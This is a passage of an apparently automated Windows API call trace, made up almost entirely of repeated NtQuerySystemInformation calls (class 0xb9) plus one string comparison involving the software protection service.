SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da70, Length=0x38, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8f0, Length=0x20, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x20, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x20, ResultLength=0x0) [0236.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x58, ResultLength=0x0) [0236.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x38, ResultLength=0x0) [0236.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x28, ResultLength=0x0) [0236.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x28, ResultLength=0x0) [0236.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x28, ResultLength=0x0) [0236.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x28, ResultLength=0x0) [0236.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8e0, Length=0x28, ResultLength=0x0) [0236.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x38, ResultLength=0x0) [0236.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x38, ResultLength=0x0) [0236.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x28, ResultLength=0x0) [0236.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x28, ResultLength=0x0) [0236.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x38, ResultLength=0x0) [0236.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x38, ResultLength=0x0) [0236.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7d0, Length=0x20, ResultLength=0x0) [0236.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d750, Length=0x20, ResultLength=0x0) [0236.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d750, Length=0x20, ResultLength=0x0) [0236.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d750, Length=0x20, ResultLength=0x0) [0236.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x20, ResultLength=0x0) [0236.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x38, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8c0, Length=0x20, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d840, Length=0x20, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d840, Length=0x20, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d840, Length=0x20, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x38, ResultLength=0x0) [0236.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8c0, Length=0x20, ResultLength=0x0) [0236.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d840, Length=0x20, ResultLength=0x0) [0236.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d840, Length=0x20, ResultLength=0x0) [0236.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d840, Length=0x20, ResultLength=0x0) [0236.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x38, ResultLength=0x0) [0236.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8c0, Length=0x20, ResultLength=0x0) [0236.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d850, Length=0x20, ResultLength=0x0) [0236.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d850, Length=0x20, ResultLength=0x0) [0236.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb8, Length=0x50, ResultLength=0x0) [0236.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x38, ResultLength=0x0) [0236.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x28, ResultLength=0x0) [0236.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x28, ResultLength=0x0) [0236.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x28, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db10, Length=0x28, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db80, Length=0x28, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x38, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc00, Length=0x28, ResultLength=0x0) [0236.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc00, Length=0x28, ResultLength=0x0) [0236.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x38, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db60, Length=0x20, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dae0, Length=0x20, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dae0, Length=0x20, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dae0, Length=0x20, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dce0, Length=0x38, ResultLength=0x0) [0236.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db60, Length=0x20, ResultLength=0x0) [0236.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7daf0, Length=0x20, ResultLength=0x0) [0236.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7daf0, Length=0x20, ResultLength=0x0) [0236.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc60, Length=0x50, ResultLength=0x0) [0236.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0236.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0236.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0236.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9c0, Length=0x28, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x28, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dab0, Length=0x28, ResultLength=0x0) [0236.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dab0, Length=0x28, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x20, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0236.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db90, Length=0x38, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x20, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x20, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x20, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.950] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0236.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc48, Length=0x50, ResultLength=0x0) [0236.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db70, Length=0x38, ResultLength=0x0) [0236.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x28, ResultLength=0x0) [0236.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x28, ResultLength=0x0) [0236.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9a0, Length=0x28, ResultLength=0x0) [0236.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da10, Length=0x28, ResultLength=0x0) [0236.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db70, Length=0x38, ResultLength=0x0) [0236.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da90, Length=0x28, ResultLength=0x0) [0236.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da90, Length=0x28, ResultLength=0x0) [0236.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db70, Length=0x38, ResultLength=0x0) [0236.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9f0, Length=0x20, ResultLength=0x0) 